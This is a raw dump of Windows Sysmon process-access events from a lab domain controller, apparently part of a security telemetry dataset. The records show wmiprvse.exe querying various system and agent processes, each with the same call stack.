15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 